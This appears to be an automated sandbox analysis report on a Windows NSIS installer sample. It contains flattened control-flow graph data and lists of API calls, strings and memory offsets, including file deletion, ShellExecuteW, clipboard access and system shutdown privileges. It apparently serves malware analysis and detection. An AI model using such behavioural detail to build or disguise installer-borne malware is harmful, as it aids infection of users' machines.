4107->4108 4109 406792 CharPrevW 4108->4109 4110 40361f 4108->4110 4109->4108 4109->4110 4111 406035 lstrcpynW 4110->4111 4111->3998 4113 4032f3 4112->4113 4114 4032db 4112->4114 4117 403303 GetTickCount 4113->4117 4118 4032fb 4113->4118 4115 4032e4 DestroyWindow 4114->4115 4116 4032eb 4114->4116 4115->4116 4116->4001 4120 403311 CreateDialogParamW ShowWindow 4117->4120 4121 403334 4117->4121 4125 40635e 4118->4125 4120->4121 4121->4001 4123->4007 4124->4008 4126 40637b PeekMessageW 4125->4126 4127 406371 DispatchMessageW 4126->4127 4128 403301 4126->4128 4127->4126 4128->4001 4130 403ed5 4129->4130 4145 405f7d wsprintfW 4130->4145 4132 403f49 4133 406831 18 API calls 4132->4133 4134 403f55 SetWindowTextW 4133->4134 4135 403f70 4134->4135 4136 403f8b 4135->4136 4137 406831 18 API calls 4135->4137 4136->4031 4137->4135 4138->4027 4139->4033 4146 406035 lstrcpynW 4140->4146 4142 403eb4 4143 40674e 3 API calls 4142->4143 4144 403eba lstrcatW 4143->4144 4144->4053 4145->4132 4146->4142 4148 403cbd 4147->4148 4149 4038a2 4148->4149 4150 403cc2 FreeLibrary GlobalFree 4148->4150 4151 406cc7 4149->4151 4150->4149 4150->4150 4152 4067aa 18 API calls 4151->4152 4153 406cda 4152->4153 4154 406ce3 DeleteFileW 4153->4154 4155 406cfa 4153->4155 4194 4038ae CoUninitialize 4154->4194 4156 406e77 4155->4156 4198 406035 lstrcpynW 4155->4198 4162 406301 2 API calls 4156->4162 4182 406e84 4156->4182 4156->4194 4158 406d25 4159 406d39 4158->4159 4160 406d2f lstrcatW 4158->4160 4163 40677d 2 API calls 4159->4163 4161 406d3f 4160->4161 4165 406d4f lstrcatW 4161->4165 4167 406d57 lstrlenW FindFirstFileW 4161->4167 4164 406e90 4162->4164 4163->4161 4168 40674e 3 API calls 4164->4168 4164->4194 4165->4167 4166 4062cf 11 API calls 4166->4194 4171 406e67 4167->4171 4195 406d7e 4167->4195 4169 406e9a 4168->4169 4172 4062cf 11 API calls 4169->4172 4170 405d32 CharNextW 4170->4195 4171->4156 4173 406ea5 4172->4173 4174 405e5c 2 API calls 4173->4174 4175 406ead RemoveDirectoryW 4174->4175 4179 
406ef0 4175->4179 4180 406eb9 4175->4180 4176 406e44 FindNextFileW 4178 406e5c FindClose 4176->4178 4176->4195 4178->4171 4181 404f9e 25 API calls 4179->4181 4180->4182 4183 406ebf 4180->4183 4181->4194 4182->4166 4185 4062cf 11 API calls 4183->4185 4184 4062cf 11 API calls 4184->4195 4186 406ec9 4185->4186 4189 404f9e 25 API calls 4186->4189 4187 406cc7 72 API calls 4187->4195 4188 405e5c 2 API calls 4190 406dfa DeleteFileW 4188->4190 4191 406ed3 4189->4191 4190->4195 4192 406c94 42 API calls 4191->4192 4192->4194 4193 404f9e 25 API calls 4193->4176 4194->3936 4194->3937 4195->4170 4195->4176 4195->4184 4195->4187 4195->4188 4195->4193 4196 404f9e 25 API calls 4195->4196 4197 406c94 42 API calls 4195->4197 4199 406035 lstrcpynW 4195->4199 4196->4195 4197->4195 4198->4158 4199->4195 4200->4085 4956 401cb2 4957 40145c 18 API calls 4956->4957 4958 401c54 4957->4958 4959 4062cf 11 API calls 4958->4959 4960 401c64 4958->4960 4961 401c59 4959->4961 4962 406cc7 81 API calls 4961->4962 4962->4960 3706 4021b5 3707 40145c 18 API calls 3706->3707 3708 4021bb 3707->3708 3709 40145c 18 API calls 3708->3709 3710 4021c4 3709->3710 3711 40145c 18 API calls 3710->3711 3712 4021cd 3711->3712 3713 40145c 18 API calls 3712->3713 3714 4021d6 3713->3714 3715 404f9e 25 API calls 3714->3715 3716 4021e2 ShellExecuteW 3715->3716 3717 40221b 3716->3717 3718 40220d 3716->3718 3719 4062cf 11 API calls 3717->3719 3720 4062cf 11 API calls 3718->3720 3721 402230 3719->3721 3720->3717 4963 402238 4964 40145c 18 API calls 4963->4964 4965 40223e 4964->4965 4966 4062cf 11 API calls 4965->4966 4967 40224b 4966->4967 4968 404f9e 25 API calls 4967->4968 4969 402255 4968->4969 4970 405c6b 2 API calls 4969->4970 4971 40225b 4970->4971 4972 4062cf 11 API calls 4971->4972 4980 4022ac CloseHandle 4971->4980 4977 40226d 4972->4977 4974 4030e3 4975 402283 WaitForSingleObject 4976 402291 GetExitCodeProcess 4975->4976 4975->4977 4979 4022a3 4976->4979 4976->4980 4977->4975 4978 40635e 2 API calls 4977->4978 
4977->4980 4978->4975 4982 405f7d wsprintfW 4979->4982 4980->4974 4982->4980 3782 401eb9 3783 401f24 3782->3783 3786 401ec6 3782->3786 3784 401f53 GlobalAlloc 3783->3784 3788 401f28 3783->3788 3790 406831 18 API calls 3784->3790 3785 401ed5 3789 4062cf 11 API calls 3785->3789 3786->3785 3792 401ef7 3786->3792 3787 401f36 3806 406035 lstrcpynW 3787->3806 3788->3787 3791 4062cf 11 API calls 3788->3791 3801 401ee2 3789->3801 3794 401f46 3790->3794 3791->3787 3804 406035 lstrcpynW 3792->3804 3796 402708 3794->3796 3797 402387 GlobalFree 3794->3797 3797->3796 3798 401f06 3805 406035 lstrcpynW 3798->3805 3799 406831 18 API calls 3799->3801 3801->3796 3801->3799 3802 401f15 3807 406035 lstrcpynW 3802->3807 3804->3798 3805->3802 3806->3794 3807->3796 4983 404039 4984 404096 4983->4984 4985 404046 lstrcpynA lstrlenA 4983->4985 4985->4984 4986 404077 4985->4986 4986->4984 4987 404083 GlobalFree 4986->4987 4987->4984

Control-flow Graph (legend: Executed, Not Executed)
APIs
• GetDlgItem.USER32(?,00000403), ref: 0040515B
• GetDlgItem.USER32(?,000003EE), ref: 0040516A
• GetClientRect.USER32(?,?), ref: 004051C2
• GetSystemMetrics.USER32(00000015), ref: 004051CA
• SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
• SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
• SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
• SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
• SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
• ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
• ShowWindow.USER32(?,00000008), ref: 00405266
• GetDlgItem.USER32(?,000003EC), ref: 00405287
• SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                                                                                                                                                                                                                          • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042795A,771B23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                                                                                                                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00405313
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                                                                                                                                                                                                                        • CreatePopupMenu.USER32 ref: 004053A2
                                                                                                                                                                                                                                                                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                                                                                                                                                                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                                                                                                                                                                                                                        • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                                                                                                                                                                                                                        • EmptyClipboard.USER32 ref: 0040543D
                                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                                                                                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                                                                                                                                                                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                                                                                                                                                                                                                        • CloseClipboard.USER32 ref: 0040549A
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                                                                                                                                        • String ID: New install of "%s" to "%s"${
                                                                                                                                                                                                                                                                                        • API String ID: 2110491804-1641061399

Control-flow Graph

[Figure: control-flow graph beginning at block 4038af-403945; legend: Executed, Not Executed]
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • #17.COMCTL32 ref: 004038CE
                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                                                                                                                                                                        • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                        • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                        • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                                                                                                                                                                        • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                                                                                                                                                                        • GetTempPathW.KERNELBASE(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                                                                                                                                                                        • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                                                                                                                                                                        • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                                                                                                                                                                        • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                                                                                                                                                                        • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                                                                                                                                                                        • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                                                                                                                                                                        • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                                                                                                                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                                                                                                                                        • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                                                                                                                                                                        • API String ID: 2435955865-3712954417
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                                        • String ID: jF
                                                                                                                                                                                                                                                                                        • API String ID: 2295610775-3349280890
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 310444273-0

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                                                                                                                                        • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                                                                                                                                        • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                                                                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                                                                                                                                        • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                                                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                                                                                                                                        • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                                                                                                                                        • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                                                                                                                                        • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                                                                                                                                        • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • Rename: %s, xrefs: 004018F8
                                                                                                                                                                                                                                                                                        • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                                                                                                                                        • BringToFront, xrefs: 004016BD
                                                                                                                                                                                                                                                                                        • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                                                                                                                                        • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                                                                                                                                        • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                                                                                                                                        • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                                                                                                                                        • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                                                                                                                                        • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                                                                                                                                        • detailprint: %s, xrefs: 00401679
                                                                                                                                                                                                                                                                                        • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                                                                                                                                        • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                                                                                                                                        • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                                                                                                                                        • Call: %d, xrefs: 0040165A
                                                                                                                                                                                                                                                                                        • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                                                                                                                                        • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                                                                                                                                        • Jump: %d, xrefs: 00401602
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                                                                                                                                        • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                                                                                                                                        • API String ID: 2872004960-3619442763

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?), ref: 004054FE
                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32 ref: 00405512
                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                                                                                                                                                                                                        • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                                                                                                                                                                                                        • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                                                                                                                                                                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                                                                                                                                                                                                                        • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                                                                                                                                                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                                                                                                                                                                                                        • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                                                                                                                                                                                                        • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3282139019-0

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                                                                                                                                                                                        • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                                                                                                                                                                                        • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                                                                                                                                                                                                        • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                                                                                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                                                                                                                                                                                                          • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                                                                                                                                                                        • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                                                                                                                                                                                                        • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                                                                                                                                                                                                        • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                                                                                                                                                                                                        • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                                                        • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                                                                                                                        • API String ID: 608394941-2746725676

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(00000000,00000000,PaypalInteriorNvidiaNirvana,004D70B0,00000000,00000000), ref: 00401A76
